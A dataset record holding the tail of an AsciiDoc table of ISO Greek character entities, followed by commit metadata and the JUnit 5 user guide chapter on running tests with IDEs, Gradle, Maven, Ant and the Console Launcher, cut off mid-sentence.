&sfgr; | ς | Greek small letter final sigma\n| &tgr; | τ | Greek small letter tau\n| & Tgr; | & #x03A4; | Greek capital letter TAU\n| &ugr; | υ | Greek small letter upsilon\n| &Ugr; | Υ | Greek capital letter UPSILON\n| &phgr; | φ | Greek small letter phi\n| &PHgr; | Φ | Greek capital letter PHI\n| &khgr; | χ | Greek small letter chi\n| &KHgr; | Χ | Greek capital letter CHI\n| &psgr; | ψ | Greek small letter psi\n| &PSgr; | Ψ | Greek capital letter PSI\n| &ohgr; | ω | Greek small letter omega\n| &OHgr; | Ω | Greek capital letter OMEGA\n|====\n\n\n=== Greek Symbols Character Entities (%isogrk3;)\nGreek Symbols Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| α | α | Greek small letter alpha\n| β | β | Greek small letter beta\n| γ | γ | Greek small letter gamma\n| Γ | Γ | Greek capital letter GAMMA\n| ϝ | Ϝ | Greek letter digamma\n| δ | δ | Greek small letter delta\n| Δ | Δ | Greek capital letter DELTA\n| ε | ε | Greek small letter epsilon\n| & epsiv; | & #x025B; | Latin small letter open e\n| & epsis; | & #x03B5; | Greek small letter epsilon\n| ζ | ζ | Greek small letter zeta\n| η | η | Greek small letter eta\n| & thetas; | & #x03B8; | Greek small letter theta\n| Θ | Θ | Greek capital letter THETA\n| & thetav; | & #x03D1; | Greek theta symbol\n| ι | ι | Greek small letter iota\n| κ | κ | Greek small letter kappa\n| ϰ | ϰ | Greek kappa symbol\n| λ | λ | Greek small letter lamda\n| Λ | Λ | Greek capital letter LAMDA\n| μ | μ | Greek small letter mu\n| ν | ν | Greek small letter nu\n| ξ | ξ | Greek small letter xi\n| Ξ | Ξ | Greek capital letter XI\n| π | π | Greek small letter pi\n| ϖ | ϖ | Greek omega symbol\n| Π | Π | Greek capital letter PI\n| ρ | ρ | Greek small letter rho\n| ϱ | ϱ | Greek rho symbol\n| σ | σ | Greek small letter sigma\n| Σ | Σ | Greek capital letter SIGMA\n| ς | ς | Greek small letter final sigma\n| τ | τ | Greek small letter tau\n| υ | υ | Greek small letter upsilon\n| ϒ | ϒ | Greek upsilon with hook symbol\n| &phis; | φ | Greek small letter phi\n| Φ | Φ | Greek capital letter PHI\n| ϕ | ϕ | Greek phi symbol\n| χ | χ | Greek small letter chi\n| ψ | ψ | Greek small letter psi\n| Ψ | Ψ | Greek capital letter PSI\n| ω | ω | Greek small letter omega\n| Ω | Ω | Greek capital letter OMEGA\n|====\n\n\n=== Alternative Greek Symbols Character Entities (%isogrk4;)\nAlternative Greek Symbols Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== ISO Latin 1 Character Entities (%isolat1;)\nISO Latin 1 Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Added Latin 2 Character Entities (%isolat2;)\nAdded Latin 2 Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Numeric and Special Graphic Character Entities (%isonum;)\nNumeric and Special Graphic Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== Publishing Character Entities (%isopub;)\nPublishing Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n=== General Technical Character Entities (%isotech;)\nGeneral Technical Character Entities\n\n[width=\"100%\",cols=\"1^,1^,4\",frame=\"topbot\", options=\"header\"]\n|====\n| Entity | Unicode | ISO Description\n| | |\n|====\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f652508bb7f619c77516d3bf62cc7920b0822893","subject":"Revise documentation on Maven support","message":"Revise documentation on Maven support\n\n - Clarify that `junit-platform-surefire-provider` will be removed in\n Platform 1.4.\n - Remove `junit-platform-surefire-provider` from all samples.\n - Move the engine dependencies to the regular dependencies in all\n samples.\n\nResolves #1535.\n","repos":"junit-team\/junit-lambda,sbrannen\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/running-tests.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/running-tests.adoc","new_contents":"[[running-tests]]\n== Running Tests\n\n[[running-tests-ide]]\n=== IDE Support\n\n[[running-tests-ide-intellij-idea]]\n==== IntelliJ IDEA\n\nIntelliJ IDEA supports running tests on the JUnit Platform since version 2016.2. For\ndetails please see the\nhttps:\/\/blog.jetbrains.com\/idea\/2016\/08\/using-junit-5-in-intellij-idea\/[post on the\nIntelliJ IDEA blog]. Note, however, that it is recommended to use IDEA 2017.3 or newer\nsince these newer versions of IDEA will download the following JARs automatically based\non the API version used in the project: `junit-platform-launcher`,\n`junit-jupiter-engine`, and `junit-vintage-engine`.\n\nWARNING: IntelliJ IDEA releases prior to IDEA 2017.3 bundle specific versions of JUnit 5.\nThus, if you want to use a newer version of JUnit Jupiter, execution of tests within the\nIDE might fail due to version conflicts. In such cases, please follow the instructions\nbelow to use a newer version of JUnit 5 than the one bundled with IntelliJ IDEA.\n\nIn order to use a different JUnit 5 version (e.g., {jupiter-version}), you may need to\ninclude the corresponding versions of the `junit-platform-launcher`,\n`junit-jupiter-engine`, and `junit-vintage-engine` JARs in the classpath.\n\n.Additional Gradle Dependencies\n[source,groovy]\n[subs=attributes+]\n----\n\/\/ Only needed to run tests in a version of IntelliJ IDEA that bundles older versions\ntestRuntime(\"org.junit.platform:junit-platform-launcher:{platform-version}\")\ntestRuntime(\"org.junit.jupiter:junit-jupiter-engine:{jupiter-version}\")\ntestRuntime(\"org.junit.vintage:junit-vintage-engine:{vintage-version}\")\n----\n\n.Additional Maven Dependencies\n[source,xml]\n[subs=attributes+]\n----\n<!-- Only needed to run tests in a version of IntelliJ IDEA that bundles older versions -->\n<dependency>\n\t<groupId>org.junit.platform<\/groupId>\n\t<artifactId>junit-platform-launcher<\/artifactId>\n\t<version>{platform-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n<dependency>\n\t<groupId>org.junit.jupiter<\/groupId>\n\t<artifactId>junit-jupiter-engine<\/artifactId>\n\t<version>{jupiter-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n<dependency>\n\t<groupId>org.junit.vintage<\/groupId>\n\t<artifactId>junit-vintage-engine<\/artifactId>\n\t<version>{vintage-version}<\/version>\n\t<scope>test<\/scope>\n<\/dependency>\n----\n\n[[running-tests-ide-eclipse]]\n==== Eclipse\n\nEclipse IDE offers support for the JUnit Platform since the Eclipse Oxygen.1a (4.7.1a)\nrelease.\n\nFor more information on using JUnit 5 in Eclipse consult the official _Eclipse support\nfor JUnit 5_ section of the\nhttps:\/\/www.eclipse.org\/eclipse\/news\/4.7.1a\/#junit-5-support[Eclipse Project Oxygen.1a\n(4.7.1a) - New and Noteworthy] documentation.\n\n[[running-tests-ide-other]]\n==== Other IDEs\n\nAt the time of this writing, there is no direct support for running tests on the JUnit\nPlatform within IDEs other than IntelliJ IDEA and Eclipse. However, the JUnit team\nprovides two intermediate solutions so that you can go ahead and try out JUnit 5 within\nyour IDE today. You can use the <<running-tests-console-launcher>> manually or execute\ntests with a <<running-tests-junit-platform-runner,JUnit 4 based Runner>>.\n\n[[running-tests-build]]\n=== Build Support\n\n[[running-tests-build-gradle]]\n==== Gradle\n\nStarting with https:\/\/docs.gradle.org\/4.6\/release-notes.html[version 4.6], Gradle provides\nhttps:\/\/docs.gradle.org\/current\/userguide\/java_testing.html#using_junit5[native support]\nfor executing tests on the JUnit Platform. To enable it, you just need to specify\n`useJUnitPlatform()` within a `test` task declaration in `build.gradle`:\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n useJUnitPlatform()\n}\n----\n\nFiltering by tags or engines is also supported:\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n useJUnitPlatform {\n includeTags 'fast', 'smoke & feature-a'\n \/\/ excludeTags 'slow', 'ci'\n includeEngines 'junit-jupiter'\n \/\/ excludeEngines 'junit-vintage'\n\t}\n}\n----\n\nPlease refer to the\nhttps:\/\/docs.gradle.org\/current\/userguide\/java_plugin.html#sec:java_test[official Gradle documentation]\nfor a comprehensive list of options.\n\n[WARNING]\n.The JUnit Platform Gradle Plugin has been discontinued\n====\nThe very basic `junit-platform-gradle-plugin` developed by the JUnit team was deprecated\nin JUnit Platform 1.2 and discontinued in 1.3. Please switch to Gradle's standard `test`\ntask.\n====\n\n[[running-tests-build-gradle-config-params]]\n===== Configuration Parameters\n\nThe standard Gradle `test` task currently does not provide a dedicated DSL to set JUnit\nPlatform <<running-tests-config-params, configuration parameters>> to influence test\ndiscovery and execution. However, you can provide configuration parameters within the\nbuild script via system properties (as shown below) or via the\n`junit-platform.properties` file.\n\n[source,java,indent=0]\n----\ntest {\n\t\/\/ ...\n\tsystemProperty 'junit.jupiter.conditions.deactivate', '*'\n\tsystemProperties = [\n\t\t'junit.jupiter.extensions.autodetection.enabled': 'true',\n\t\t'junit.jupiter.testinstance.lifecycle.default': 'per_class'\n\t]\n\t\/\/ ...\n}\n----\n\n[[running-tests-build-gradle-engines-configure]]\n===== Configuring Test Engines\n\nIn order to run any tests at all, a `TestEngine` implementation must be on the classpath.\n\nTo configure support for JUnit Jupiter based tests, configure a `testCompile` dependency\non the JUnit Jupiter API and a `testRuntime` dependency on the JUnit Jupiter `TestEngine`\nimplementation similar to the following.\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ndependencies {\n\ttestCompile(\"org.junit.jupiter:junit-jupiter-api:{jupiter-version}\")\n\ttestRuntime(\"org.junit.jupiter:junit-jupiter-engine:{jupiter-version}\")\n}\n----\n\nThe JUnit Platform can run JUnit 4 based tests as long as you configure a `testCompile`\ndependency on JUnit 4 and a `testRuntime` dependency on the JUnit Vintage `TestEngine`\nimplementation similar to the following.\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ndependencies {\n\ttestCompile(\"junit:junit:{junit4-version}\")\n\ttestRuntime(\"org.junit.vintage:junit-vintage-engine:{vintage-version}\")\n}\n----\n\n[[running-tests-build-gradle-logging]]\n===== Configuring Logging (optional)\n\nJUnit uses the Java Logging APIs in the `java.util.logging` package (a.k.a. _JUL_) to\nemit warnings and debug information. Please refer to the official documentation of\n`{LogManager}` for configuration options.\n\nAlternatively, it's possible to redirect log messages to other logging frameworks such as\n{Log4j} or {Logback}. To use a logging framework that provides a custom implementation of\n`{LogManager}`, set the `java.util.logging.manager` system property to the _fully\nqualified class name_ of the `{LogManager}` implementation to use. The example below\ndemonstrates how to configure Log4j{nbsp}2.x (see {Log4j_JDK_Logging_Adapter} for\ndetails).\n\n[source,java,indent=0]\n[subs=attributes+]\n----\ntest {\n\tsystemProperty 'java.util.logging.manager', 'org.apache.logging.log4j.jul.LogManager'\n}\n----\n\nOther logging frameworks provide different means to redirect messages logged using\n`java.util.logging`. For example, for {Logback} you can use the\nhttps:\/\/www.slf4j.org\/legacy.html#jul-to-slf4j[JUL to SLF4J Bridge] by adding an\nadditional dependency to the runtime classpath.\n\n[[running-tests-build-maven]]\n==== Maven\n\nNOTE: The custom `junit-platform-surefire-provider`, which was originally developed by the JUnit team, has been deprecated and is scheduled to be removed in JUnit Platform 1.4. Please use the Maven Surefire's native support instead.\n\nStarting with https:\/\/issues.apache.org\/jira\/browse\/SUREFIRE-1330[version 2.22.0],\nMaven Surefire provides\nhttp:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/junit-platform.html[native support]\nfor executing tests on the JUnit Platform. The `pom.xml` file in the\n`{junit5-jupiter-starter-maven}` project demonstrates how to it and can serve as a\nstarting point for configuring your Maven build.\n\n[[running-tests-build-maven-engines-configure]]\n===== Configuring Test Engines\n\nIn order to have Maven Surefire run any tests at all, at least one `TestEngine`\nimplementation must be added to the test classpath.\n\nTo configure support for JUnit Jupiter based tests, configure a `test` dependency on the\nJUnit Jupiter API and the JUnit Jupiter `TestEngine` implementation.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>org.junit.jupiter<\/groupId>\n\t\t\t<artifactId>junit-jupiter-api<\/artifactId>\n\t\t\t<version>{jupiter-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.junit.jupiter<\/groupId>\n\t\t\t<artifactId>junit-jupiter-engine<\/artifactId>\n\t\t\t<version>{jupiter-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t\t...\n\t<\/dependencies>\n\t...\n----\n\nMaven Surefire can run JUnit 4 based tests alongside Jupiter tests as long as you\nconfigure a `test` dependency on JUnit 4 and the JUnit Vintage `TestEngine` implementation similar to the following.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>junit<\/groupId>\n\t\t\t<artifactId>junit<\/artifactId>\n\t\t\t<version>{junit4-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.junit.vintage<\/groupId>\n\t\t\t<artifactId>junit-vintage-engine<\/artifactId>\n\t\t\t<version>{vintage-version}<\/version>\n\t\t\t<scope>test<\/scope>\n\t\t<\/dependency>\n\t\t...\n\t<\/dependencies>\n\t...\n----\n\n[[running-tests-build-maven-filter-test-class-names]]\n===== Filtering by Test Class Names\n\nThe Maven Surefire Plugin will scan for test classes whose fully qualified names match\nthe following patterns.\n\n- `+**\/Test*.java+`\n- `+**\/*Test.java+`\n- `+**\/*Tests.java+`\n- `+**\/*TestCase.java+`\n\nMoreover, it will exclude all nested classes (including static member classes) by default.\n\nNote, however, that you can override this default behavior by configuring explicit\n`include` and `exclude` rules in your `pom.xml` file. For example, to keep Maven Surefire\nfrom excluding static member classes, you can override its exclude rules.\n\n[source,xml,indent=0]\n[subs=attributes+]\n.Overriding exclude rules of Maven Surefire\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<excludes>\n\t\t\t\t\t\t<exclude\/>\n\t\t\t\t\t<\/excludes>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\nPlease see the\nhttps:\/\/maven.apache.org\/surefire\/maven-surefire-plugin\/examples\/inclusion-exclusion.html[Inclusions and Exclusions of Tests]\ndocumentation for Maven Surefire for details.\n\n[[running-tests-build-maven-filter-tags]]\n===== Filtering by Tags\n\nYou can filter tests by tags or <<running-tests-tag-expressions, tag expressions>> using\nthe following configuration properties.\n\n- to include _tags_ or _tag expressions_, use `groups`.\n- to exclude _tags_ or _tag expressions_, use `excludedGroups`.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<groups>acceptance | !feature-a<\/groups>\n\t\t\t\t\t<excludedGroups>integration, regression<\/excludedGroups>\n\t\t\t <\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-maven-config-params]]\n===== Configuration Parameters\n\nYou can set JUnit Platform <<running-tests-config-params, configuration parameters>> to\ninfluence test discovery and execution by declaring the `configurationParameters`\nproperty and providing key-value pairs using the Java `Properties` file syntax (as shown\nbelow) or via the `junit-platform.properties` file.\n\n[source,xml,indent=0]\n[subs=attributes+]\n----\n\t...\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-surefire-plugin<\/artifactId>\n\t\t\t\t<version>{surefire-version}<\/version>\n\t\t\t\t<configuration>\n\t\t\t\t\t<properties>\n\t\t\t\t\t\t<configurationParameters>\n\t\t\t\t\t\t\tjunit.jupiter.conditions.deactivate = *\n\t\t\t\t\t\t\tjunit.jupiter.extensions.autodetection.enabled = true\n\t\t\t\t\t\t\tjunit.jupiter.testinstance.lifecycle.default = per_class\n\t\t\t\t\t\t<\/configurationParameters>\n\t\t\t\t\t<\/properties>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n\t...\n----\n\n[[running-tests-build-ant]]\n==== Ant\n\nStarting with version `1.10.3` of link:https:\/\/ant.apache.org\/[Ant], a new\nlink:https:\/\/ant.apache.org\/manual\/Tasks\/junitlauncher.html[`junitlauncher`] task has\nbeen introduced to provide native support for launching tests on the JUnit Platform. The\n`junitlauncher` task is solely responsible for launching the JUnit Platform and passing\nit the selected collection of tests. The JUnit Platform then delegates to registered test\nengines to discover and execute the tests.\n\nThe `junitlauncher` task attempts to align as close as possible with native Ant\nconstructs such as\nlink:https:\/\/ant.apache.org\/manual\/Types\/resources.html#collection[resource collections]\nfor allowing users to select the tests that they want executed by test engines. This\ngives the task a consistent and natural feel when compared to many other core Ant tasks.\n\nNOTE: The version of the `junitlauncher` task shipped in Ant 1.10.3 provides basic,\nminimal support for launching the JUnit Platform. Additional enhancements (including\nsupport for forking the tests in a separate JVM) will be available in subsequent releases\nof Ant.\n\nThe `build.xml` file in the `{junit5-jupiter-starter-ant}` project demonstrates how to use\nit and can serve as a starting point.\n\n===== Basic Usage\n\nThe following example demonstrates how to configure the `junitlauncher` task to select a\nsingle test class (i.e., `org.myapp.test.MyFirstJUnit5Test`).\n\n[source,xml,indent=0]\n----\n\t<path id=\"test.classpath\">\n\t\t<!-- The location where you have your compiled classes -->\n\t\t<pathelement location=\"${build.classes.dir}\" \/>\n\t<\/path>\n\n\t<!-- ... -->\n\n\t<junitlauncher>\n\t\t<classpath refid=\"test.classpath\" \/>\n\t\t<test name=\"org.myapp.test.MyFirstJUnit5Test\" \/>\n\t<\/junitlauncher>\n----\n\nThe `test` element allows you to specify a single test class that you want to be selected\nand executed. The `classpath` element allows you to specify the classpath to be used to\nlaunch the JUnit Platform. This classpath will also be used to locate test classes that\nare part of the execution.\n\nThe following example demonstrates how to configure the `junitlauncher` task to select\ntest classes from multiple locations.\n\n[source,xml,indent=0]\n----\n\t<path id=\"test.classpath\">\n\t\t<!-- The location where you have your compiled classes -->\n\t\t<pathelement location=\"${build.classes.dir}\" \/>\n\t<\/path>\n\t....\n\t<junitlauncher>\n\t\t<classpath refid=\"test.classpath\" \/>\n\t\t<testclasses outputdir=\"${output.dir}\">\n\t\t\t<fileset dir=\"${build.classes.dir}\">\n\t\t\t\t<include name=\"org\/example\/**\/demo\/**\/\" \/>\n\t\t\t<\/fileset>\n\t\t\t<fileset dir=\"${some.other.dir}\">\n\t\t\t\t<include name=\"org\/myapp\/**\/\" \/>\n\t\t\t<\/fileset>\n\t\t<\/testclasses>\n\t<\/junitlauncher>\n----\n\nIn the above example, the `testclasses` element allows you to select multiple test\nclasses that reside in different locations.\n\nFor further details on usage and configuration options please refer to the official Ant\ndocumentation for the\nlink:https:\/\/ant.apache.org\/manual\/Tasks\/junitlauncher.html[`junitlauncher` task].\n\n[[running-tests-console-launcher]]\n=== Console Launcher\n\nThe `{ConsoleLauncher}` is a command-line Java application that lets you launch the JUnit\nPlatform from the console. For example, it can be used to run JUnit Vintage and JUnit\nJupiter tests and print test execution results to the console.\n\nAn executable `junit-platform-console-standalone-{platform-version}.jar` with all\ndependencies included is published in the central Maven repository under the\nhttps:\/\/repo1.maven.org\/maven2\/org\/junit\/platform\/junit-platform-console-standalone[junit-platform-console-standalone]\ndirectory. You can https:\/\/docs.oracle.com\/javase\/tutorial\/deployment\/jar\/run.html[run] the\nstandalone `ConsoleLauncher` as shown below.\n\n`java -jar junit-platform-console-standalone-{platform-version}.jar <<<running-tests-console-launcher-options>>>`\n\nHere's an example of its output:\n\n....\n\u251c\u2500 JUnit Vintage\n\u2502 \u2514\u2500 example.JUnit4Tests\n\u2502 \u2514\u2500 standardJUnit4Test \u2714\n\u2514\u2500 JUnit Jupiter\n \u251c\u2500 StandardTests\n \u2502 \u251c\u2500 succeedingTest() \u2714\n \u2502 \u2514\u2500 skippedTest() \u21b7 for demonstration purposes\n \u2514\u2500 A special test case\n \u251c\u2500 Custom test name containing spaces \u2714\n \u251c\u2500 \u256f\u00b0\u25a1\u00b0\uff09\u256f \u2714\n \u2514\u2500 \ud83d\ude31 \u2714\n\nTest run finished after 64 ms\n[ 5 containers found ]\n[ 0 containers skipped ]\n[ 5 containers started ]\n[ 0 containers aborted ]\n[ 5 containers successful ]\n[ 0 containers failed ]\n[ 6 tests found ]\n[ 1 tests skipped ]\n[ 5 tests started ]\n[ 0 tests aborted ]\n[ 5 tests successful ]\n[ 0 tests failed ]\n....\n\n.Exit Code\nNOTE: The `{ConsoleLauncher}` exits with a status code of `1` if any containers or tests\nfailed. If no tests are discovered and the `--fail-if-no-tests` command-line option is\nsupplied, the `ConsoleLauncher` exits with a status code of `2`. Otherwise the exit code\nis `0`.\n\n[[running-tests-console-launcher-options]]\n==== Options\n\n----\ninclude::{consoleLauncherOptionsFile}[]\n----\n\n[[running-tests-console-launcher-argument-files]]\n==== Argument Files (@-files)\n\nOn some platforms you may run into system limitations on the length of a command line\nwhen creating a command line with lots of options or with long arguments.\n\nSince version 1.3, the `ConsoleLauncher` supports _argument files_, also known as\n_@-files_. Argument files are files that themselves contain arguments to be passed to the\ncommand. When the underlying https:\/\/github.com\/remkop\/picocli[picocli] command line\nparser encounters an argument beginning with the character `@`, it expands the contents\nof that file into the argument list.\n\nThe arguments within a file can be separated by spaces or newlines. If an argument\ncontains embedded whitespace, the whole argument should be wrapped in double or single\nquotes -- for example, `\"-f=My Files\/Stuff.java\"`.\n\nIf the argument file does not exist or cannot be read, the argument will be treated\nliterally and will not be removed. This will likely result in an \"unmatched argument\"\nerror message. You can troubleshoot such errors by executing the command with the\n`picocli.trace` system property set to `DEBUG`.\n\nMultiple _@-files_ may be specified on the command line. The specified path may be\nrelative to the current directory or absolute.\n\nYou can pass a real parameter with an initial `@` character by escaping it with an\nadditional `@` symbol. For example, `@@somearg` will become `@somearg` and will not be\nsubject to expansion.\n\n\n[[running-tests-junit-platform-runner]]\n=== Using JUnit 4 to run the JUnit Platform\n\nThe `JUnitPlatform` runner is a JUnit 4 based `Runner` which enables you to run any test\nwhose programming model is supported on the JUnit Platform in a JUnit 4 environment --\nfor example, a JUnit Jupiter test class.\n\nAnnotating a class with `@RunWith(JUnitPlatform.class)` allows it to be run with IDEs and\nbuild systems that support JUnit 4 but do not yet support the JUnit Platform directly.\n\nNOTE: Since the JUnit Platform has features that JUnit 4 does not have, the runner is\nonly able to support a subset of the JUnit Platform functionality, especially with regard\nto reporting (see <<running-tests-junit-platform-runner-technical-names>>). But for the\ntime being the `JUnitPlatform` runner is an easy way to get started.\n\n[[running-tests-junit-platform-runner-setup]]\n==== Setup\n\nYou need the following artifacts and their dependencies on the classpath. See\n<<dependency-metadata>> for details regarding group IDs, artifact IDs, and versions.\n\n===== Explicit Dependencies\n\n* `junit-platform-runner` in _test_ scope: location of the `JUnitPlatform` runner\n* `junit-{junit4-version}.jar` in _test_ scope: to run tests using JUnit 4\n* `junit-jupiter-api` in _test_ scope: API for writing tests using JUnit Jupiter, including `@Test`, etc.\n* `junit-jupiter-engine` in _test runtime_ scope: implementation of the `TestEngine` API for JUnit Jupiter\n\n===== Transitive Dependencies\n\n* `junit-platform-suite-api` in _test_ scope\n* `junit-platform-launcher` in _test_ scope\n* `junit-platform-engine` in _test_ scope\n* `junit-platform-commons` in _test_ scope\n* `opentest4j` in _test_ scope\n\n[[running-tests-junit-platform-runner-technical-names]]\n==== Display Names vs. Technical Names\n\nTo define a custom _display name_ for the class run via `@RunWith(JUnitPlatform.class)`\nsimply annotate the class with `@SuiteDisplayName` and provide a custom value.\n\nBy default, _display names_ will be used for test artifacts; however, when the\n`JUnitPlatform` runner is used to execute tests with a build tool such as Gradle or\nMaven, the generated test report often needs to include the _technical names_ of test\nartifacts \u2014 for example, fully qualified class names \u2014 instead of shorter display names\nlike the simple name of a test class or a custom display name containing special\ncharacters. To enable technical names for reporting purposes, simply declare the\n`@UseTechnicalNames` annotation alongside `@RunWith(JUnitPlatform.class)`.\n\nNote that the presence of `@UseTechnicalNames` overrides any custom display name\nconfigured via `@SuiteDisplayName`.\n\n[[running-tests-junit-platform-runner-single-test]]\n==== Single Test Class\n\nOne way to use the `JUnitPlatform` runner is to annotate a test class with\n`@RunWith(JUnitPlatform.class)` directly. Please note that the test methods in the\nfollowing example are annotated with `org.junit.jupiter.api.Test` (JUnit Jupiter), not\n`org.junit.Test` (JUnit Vintage). Moreover, in this case the test class must be `public`;\notherwise, some IDEs and build tools might not recognize it as a JUnit 4 test class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/JUnit4ClassDemo.java[tags=user_guide]\n----\n\n[[running-tests-junit-platform-runner-test-suite]]\n==== Test Suite\n\nIf you have multiple test classes you can create a test suite as can be seen in the\nfollowing example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/JUnit4SuiteDemo.java[tags=user_guide]\n----\n\nThe `JUnit4SuiteDemo` will discover and run all tests in the `example` package\nand its subpackages. By default, it will only include test classes whose names\neither begin with `Test` or end with `Test` or `Tests`.\n\n.Additional Configuration Options\nNOTE: There are more configuration options for discovering and filtering tests than just\n`@SelectPackages`. Please consult the\n{javadoc-root}\/org\/junit\/platform\/suite\/api\/package-summary.html[Javadoc] for further\ndetails.\n\n[[running-tests-config-params]]\n=== Configuration Parameters\n\nIn addition to instructing the platform which test classes and test engines to include,\nwhich packages to scan, etc., it is sometimes necessary to provide additional custom\nconfiguration parameters that are specific to a particular test engine or registered\nextension. For example, the JUnit Jupiter `TestEngine` supports _configuration\nparameters_ for the following use cases.\n\n- <<writing-tests-test-instance-lifecycle-changing-default>>\n- <<extensions-registration-automatic-enabling>>\n- <<extensions-conditions-deactivation>>\n\n_Configuration Parameters_ are text-based key-value pairs that can be supplied to test\nengines running on the JUnit Platform via one of the following mechanisms.\n\n1. The `configurationParameter()` and `configurationParameters()` methods in the\n `LauncherDiscoveryRequestBuilder` which is used to build a request supplied to the\n <<launcher-api, `Launcher` API>>. When running tests via one of the tools provided\n by the JUnit Platform you can specify configuration parameters as follows:\n * <<running-tests-console-launcher,Console Launcher>>: use the `--config`\n command-line option.\n * <<running-tests-build-gradle-config-params,Gradle>>: use the\n `systemProperty` or `systemProperties` DSL.\n * <<running-tests-build-maven-config-params,Maven Surefire provider>>: use the\n `configurationParameters` property.\n2. JVM system properties.\n3. The JUnit Platform configuration file: a file named `junit-platform.properties` in the\n root of the class path that follows the syntax rules for a Java `Properties` file.\n\nNOTE: Configuration parameters are looked up in the exact order defined above.\nConsequently, configuration parameters supplied directly to the `Launcher` take\nprecedence over those supplied via system properties and the configuration file.\nSimilarly, configuration parameters supplied via system properties take precedence over\nthose supplied via the configuration file.\n\n[[running-tests-tag-expressions]]\n=== Tag Expressions\nTag expressions are boolean expressions with the operators `!`, `&` and `|`. In addition,\n`(` and `)` can be used to adjust for operator precedence.\n\n.Operators (in descending order of precedence)\n|===\n| Operator | Meaning | Associativity\n\n| `!` | not | right\n| `&` | and | left\n| `\\|` | or | left\n|===\n\nIf you are tagging your tests across multiple dimensions, tag expressions help you to\nselect which tests to execute. Tagging by test type (e.g. _micro_, _integration_,\n_end-to-end_) and feature (e.g. *foo*, *bar*, *baz*) the following tag expressions can be\nuseful.\n\n[%header,cols=\"40,60\"]\n|===\n| Tag Expression\n| Selection\n\n| +foo+\n| all tests for *foo*\n\n| +bar \\| baz+\n| all tests for *bar* plus all tests for *baz*\n\n| +bar & baz+\n| all tests for the intersection between *bar* and *baz*\n\n| +foo & !end-to-end+\n| all tests for *foo*, but not the _end-to-end_ tests\n\n| +(micro \\| integration) & (foo \\| baz)+\n| all _micro_ or _integration_ tests for *foo* or *baz*\n|===\n\n[[running-tests-capturing-output]]\n=== Capturing Standard Output\/Error\n\nSince version 1.3, the JUnit Platform provides opt-in support for capturing output\nprinted to `System.out` and `System.err`. To enable it, simply set the\n`junit.platform.output.capture.stdout` and\/or `junit.platform.output.capture.stderr`\n<<running-tests-config-params, configuration parameter>> to `true`. In addition, you may\nconfigure the maximum number of buffered bytes to be used per executed test or container\nusing `junit.platform.output.capture.maxBuffer`.\n\nIf enabled, the JUnit Platform captures the corresponding output and publishes it as a\nreport entry using the `stdout` or `stderr` keys to all registered\n`{TestExecutionListener}` instances immediately before reporting the test or container as\nfinished.\n\nPlease note that the captured output will only contain output emitted by the thread that\nwas used to execute a container or test. Any output by other threads will be omitted\nbecause particularly 